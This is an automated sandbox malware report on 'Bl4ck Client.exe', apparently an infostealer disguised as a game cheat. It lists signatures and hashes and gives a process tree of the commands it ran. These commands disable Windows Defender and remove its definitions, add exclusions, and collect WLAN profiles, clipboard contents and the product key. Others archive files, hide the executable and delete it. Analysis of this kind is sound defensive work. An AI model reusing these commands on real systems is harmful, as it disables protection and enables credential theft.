Analysis
max time kernel: 147s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-05-2024 16:56
Behavioral tasks
behavioral1: sample "Bl4ck Client.exe", resource win7-20240221-en
behavioral2: sample "Bl4ck Client.exe", resource win10v2004-20240426-en
behavioral3: sample "��~�K�.pyc", resource win7-20240221-en
behavioral4: sample "��~�K�.pyc", resource win10v2004-20240426-en
General
Target: Bl4ck Client.exe
Size: 6.0MB
MD5: 4861a568eb379fcd43b5a0db6994f9e2
SHA1: 4a02f9bc5be0fe193c4d71be4d89553b56a1222f
SHA256: af479e34de20aa19a1214d21b9a3c1083b4d37ab1479022df49b4ce06d57938a
SHA512: 0fb058fcab917d4742fcaa72af6c33594bd088a86e41d76e402b807851c30ab7eea940de2a895b6c6db48933b51ad84628ab56937c9796fb78fbc128132b623c
SSDEEP: 98304:TrSrEtdFBCwAamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R0OuAKsXw3Dw:TrSCFIwBeN/FJMIDJf0gsAGK4RXuAKsh
Malware Config

Signatures

Command and Scripting Interpreter: PowerShell (3 IoCs)
Processes:
  3388 powershell.exe
  3384 powershell.exe
  3084 powershell.exe
Drops file in Drivers directory (3 IoCs)
Processes:
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  Bl4ck Client.exe
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  attrib.exe
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  attrib.exe
Executes dropped EXE (1 IoCs)
Processes:
  2720 rar.exe
Loads dropped DLL (17 IoCs)
Processes:
  3620 Bl4ck Client.exe (17 entries)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

yara_rule upx matched on the following resources:
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\python310.dll
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\_ctypes.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\libffi-7.dll
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\_ssl.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\_sqlite3.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\_socket.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\_queue.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\_lzma.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\_hashlib.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\_decimal.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\_bz2.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\unicodedata.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\sqlite3.dll
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\select.pyd
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\libssl-1_1.dll
  C:\Users\Admin\AppData\Local\Temp\_MEI30122\libcrypto-1_1.dll
  behavioral2/memory/3620-*-memory.dmp (memory regions of pid 3620; many matches, address ranges not listed)
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow 8   ip-api.com
  flow 21  ip-api.com
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Detects videocard installed (1 TTPs, 3 IoCs)
Uses WMIC.exe to determine videocard installed.
Processes:
  3672 WMIC.exe
  3180 WMIC.exe
  4524 WMIC.exe

Enumerates processes with tasklist (1 TTPs, 5 IoCs)
Processes:
  2292 tasklist.exe
  2940 tasklist.exe
  1192 tasklist.exe
  916 tasklist.exe
  2124 tasklist.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  msedge.exe

Gathers system information (1 TTPs, 1 IoCs)
Runs systeminfo.exe.

Opens file in notepad (likely ransom note) (2 IoCs)
Processes:
  4804 NOTEPAD.EXE
  4016 NOTEPAD.EXE

Runs ping.exe (1 TTPs, 1 IoCs)
Suspicious behavior: EnumeratesProcesses (24 IoCs)
Processes:
  3384 powershell.exe (x3)
  5040 powershell.exe (x3)
  3084 powershell.exe (x2)
  2308 powershell.exe (x3)
  3388 powershell.exe (x3)
  3188 powershell.exe (x2)
  2408 powershell.exe (x2)
  3760 msedge.exe (x2)
  1424 msedge.exe (x2)
  4492 identity_helper.exe (x2)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (2 IoCs)
Processes:
  1424 msedge.exe (x2)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  1192 tasklist.exe: SeDebugPrivilege
  3384 powershell.exe: SeDebugPrivilege
  5040 powershell.exe: SeDebugPrivilege
  5080 WMIC.exe (two separate runs), each time enabling in order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3672 WMIC.exe: the same sequence, recorded up to token 34 (the listing stops at 64 entries)
Suspicious use of FindShellTrayWindow (26 IoCs)
Processes:
  1424 msedge.exe (x26)

Suspicious use of SendNotifyMessage (24 IoCs)
Processes:
  1424 msedge.exe (x24)
Suspicious use of WriteProcessMemory (64 IoCs; every pair below is recorded twice in the report)
Processes (pid process -> target pid process):
  3012 Bl4ck Client.exe -> 3620 Bl4ck Client.exe
  3620 Bl4ck Client.exe -> 756 cmd.exe
  3620 Bl4ck Client.exe -> 1516 cmd.exe
  3620 Bl4ck Client.exe -> 1484 cmd.exe
  3620 Bl4ck Client.exe -> 4292 cmd.exe
  3620 Bl4ck Client.exe -> 2984 cmd.exe
  4292 cmd.exe -> 1192 tasklist.exe
  2984 cmd.exe -> 5080 WMIC.exe
  1484 cmd.exe -> 1572 mshta.exe
  756 cmd.exe -> 3384 powershell.exe
  1516 cmd.exe -> 5040 powershell.exe
  3620 Bl4ck Client.exe -> 1436 cmd.exe
  1436 cmd.exe -> 2472 reg.exe
  3620 Bl4ck Client.exe -> 1856 cmd.exe
  1856 cmd.exe -> 4456 reg.exe
  3620 Bl4ck Client.exe -> 3264 tree.com
  3264 cmd.exe -> 3672 WMIC.exe
  3620 Bl4ck Client.exe -> 4684 cmd.exe
  4684 cmd.exe -> 3180 WMIC.exe
  3620 Bl4ck Client.exe -> 4848 cmd.exe
  3620 Bl4ck Client.exe -> 552 cmd.exe
  4848 cmd.exe -> 2016 attrib.exe
  552 cmd.exe -> 3084 powershell.exe
  3620 Bl4ck Client.exe -> 5052 cmd.exe
  3620 Bl4ck Client.exe -> 3716 cmd.exe
  5052 cmd.exe -> 916 tasklist.exe
  3716 cmd.exe -> 2124 tasklist.exe
  3620 Bl4ck Client.exe -> 2608 csc.exe
  3620 Bl4ck Client.exe -> 4104 cmd.exe
  2608 cmd.exe -> 1172 WMIC.exe
  4104 cmd.exe -> 2308 powershell.exe
  3620 Bl4ck Client.exe -> 1660 cmd.exe
Views/modifies file attributes (1 TTPs, 3 IoCs)
Processes:
  4404 attrib.exe
  2016 attrib.exe
  3048 attrib.exe
Processes (indented by process-tree depth)

C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe"
  PID: 3012
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe"
    PID: 3620
    - Drops file in Drivers directory
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe'"
      PID: 756
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe'
        PID: 3384
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      PID: 1516
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        PID: 5040
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please contact the owner to get a new one', 0, 'The cheat is outdated', 48+16);close()""
      PID: 1484
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\mshta.exe
        Command line: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please contact the owner to get a new one', 0, 'The cheat is outdated', 48+16);close()"
        PID: 1572
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      PID: 4292
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\tasklist.exe
        Command line: tasklist /FO LIST
        PID: 1192
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      PID: 2984
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic csproduct get uuid
        PID: 5080
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      PID: 1436
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\reg.exe
        Command line: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        PID: 2472
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      PID: 1856
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\reg.exe
        Command line: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        PID: 4456
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      PID: 3264
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic path win32_VideoController get name
        PID: 3672
        - Detects videocard installed
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      PID: 4684
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic path win32_VideoController get name
        PID: 3180
        - Detects videocard installed
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe""
      PID: 4848
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\attrib.exe
        Command line: attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe"
        PID: 2016
        - Views/modifies file attributes
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      PID: 552
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        PID: 3084
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      PID: 5052
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\tasklist.exe
        Command line: tasklist /FO LIST
        PID: 916
        - Enumerates processes with tasklist
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      PID: 3716
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\tasklist.exe
        Command line: tasklist /FO LIST
        PID: 2124
        - Enumerates processes with tasklist
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      PID: 2608
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\Wbem\WMIC.exe
        Command line: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        PID: 1172
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      PID: 4104
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell Get-Clipboard
        PID: 2308
        - Suspicious behavior: EnumeratesProcesses
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      PID: 1660
      C:\Windows\system32\tasklist.exe
        Command line: tasklist /FO LIST
        PID: 2292
        - Enumerates processes with tasklist
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID: 820
      C:\Windows\system32\tree.com
        Command line: tree /A /F
        PID: 3264
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      PID: 2728
      C:\Windows\system32\netsh.exe
        Command line: netsh wlan show profile
        PID: 440
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "systeminfo"
      PID: 4372
      C:\Windows\system32\systeminfo.exe
        Command line: systeminfo
        PID: 1564
        - Gathers system information
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      PID: 3856
      C:\Windows\system32\reg.exe
        Command line: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        PID: 1036
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
      PID: 2192
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
        PID: 3388
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m01spxuq\m01spxuq.cmdline"
          PID: 2608
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4585.tmp" "c:\Users\Admin\AppData\Local\Temp\m01spxuq\CSC716C66F4F9C249B4BCB65CBF505372C6.TMP"
            PID: 2896
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID: 4468
      C:\Windows\system32\tree.com
        Command line: tree /A /F
        PID: 3644
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      PID: 4444
      C:\Windows\system32\attrib.exe
        Command line: attrib -r C:\Windows\System32\drivers\etc\hosts
        PID: 3048
        - Drops file in Drivers directory
        - Views/modifies file attributes
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID: 4004
      C:\Windows\system32\tree.com
        Command line: tree /A /F
        PID: 3212
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      PID: 4400
      C:\Windows\system32\attrib.exe
        Command line: attrib +r C:\Windows\System32\drivers\etc\hosts
        PID: 4404
        - Drops file in Drivers directory
        - Views/modifies file attributes
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID: 2764
      C:\Windows\system32\tree.com
        Command line: tree /A /F
        PID: 1508
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      PID: 4472
      C:\Windows\system32\tasklist.exe
        Command line: tasklist /FO LIST
        PID: 2940
        - Enumerates processes with tasklist
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID: 5004
      C:\Windows\system32\tree.com
        Command line: tree /A /F
        PID: 912
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID: 1972
      C:\Windows\system32\tree.com
        Command line: tree /A /F
        PID: 4444
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "getmac"
      PID: 3396
      C:\Windows\system32\getmac.exe
        Command line: getmac
        PID: 2228
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI30122\rar.exe a -r -hp"b" "C:\Users\Admin\AppData\Local\Temp\fBqKT.zip" *"
      PID: 3832
      C:\Users\Admin\AppData\Local\Temp\_MEI30122\rar.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\_MEI30122\rar.exe a -r -hp"b" "C:\Users\Admin\AppData\Local\Temp\fBqKT.zip" *
        PID: 2720
        - Executes dropped EXE
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      PID: 2852
      C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic os get Caption
        PID: 4696
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      PID: 1988
      C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic computersystem get totalphysicalmemory
        PID: 552
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      PID: 4880
      C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic csproduct get uuid
        PID: 4464
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      PID: 2024
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        PID: 3188
        - Suspicious behavior: EnumeratesProcesses
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      PID: 916
      C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic path win32_VideoController get name
        PID: 4524
        - Detects videocard installed
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      PID: 3664
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        PID: 2408
        - Suspicious behavior: EnumeratesProcesses
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe""
      PID: 2260
      C:\Windows\system32\PING.EXE
        Command line: ping localhost -n 3
        PID: 2724
        - Runs ping.exe
C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 3700

C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1714135575.txt
  PID: 4804
  - Opens file in notepad (likely ransom note)

C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\jusched.log
  PID: 4016
  - Opens file in notepad (likely ransom note)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jawshtml.html
  PID: 1424
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc7c1446f8,0x7ffc7c144708,0x7ffc7c144718
    PID: 4452
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2
    PID: 2028
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
    PID: 3760
    - Suspicious behavior: EnumeratesProcesses
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
    PID: 4060
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
    PID: 4836
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
    PID: 3048
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:8
    PID: 4548
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:8
    PID: 4492
    - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 4728

C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 4228
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize 2KB
  MD5 d85ba6ff808d9e5444a4b369f5bc2730
  SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- Filesize 152B
  MD5 b2a1398f937474c51a48b347387ee36a
  SHA1 922a8567f09e68a04233e84e5919043034635949
  SHA256 2dc0bf08246ddd5a32288c895d676017578d792349ca437b1b36e7b2f0ade6d6
  SHA512 4a660c0549f7a850e07d8d36dab33121af02a7bd7e9b2f0137930b4c8cd89b6c5630e408f882684e6935dcb0d5cb5e01a854950eeda252a4881458cafcc7ef7c
- Filesize 152B
  MD5 1ac52e2503cc26baee4322f02f5b8d9c
  SHA1 38e0cee911f5f2a24888a64780ffdf6fa72207c8
  SHA256 f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4
  SHA512 7670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834
- Filesize 5KB
  MD5 a11b6ceaffa5f5548eb1cf423e0769b4
  SHA1 2a01a2c7b88decbf309c0f50b7f9b33110ec73c7
  SHA256 89bfa38a0484978f9458e71c759bb646a47e2f16b8b982b8dd8a031295cf4df0
  SHA512 77a3081e1462fd5577169dc9ae07ccf49624a763c6135e845bbe8a20c4b3f625015d284fe18a8cbff0bef74432bbf2dffe92b6d1d2a2f216e8989a77e3c47897
- Filesize 6KB
  MD5 914cb1c2c1a4c28bef533b88708879e4
  SHA1 647a79ea35bf41804fde94d5bc647f0701dfcdbf
  SHA256 a29dea40ee79dcda4d2866fe2e0bc72d31a51d63f624408b73431d5c98eca5e8
